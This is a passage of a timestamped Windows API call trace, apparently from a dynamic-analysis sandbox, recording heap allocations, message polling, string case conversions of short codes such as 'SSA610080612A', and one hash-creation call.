0x24aa920 [0262.877] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.878] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.878] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.878] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0262.878] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.879] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0262.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.880] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.880] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0262.880] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.880] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.881] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.881] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.881] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.881] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.881] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.881] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.881] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.882] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.882] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.882] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.882] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.883] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.883] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.883] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.884] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.884] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.885] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0262.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0262.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.887] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0262.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.888] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.888] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.889] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.889] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.889] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 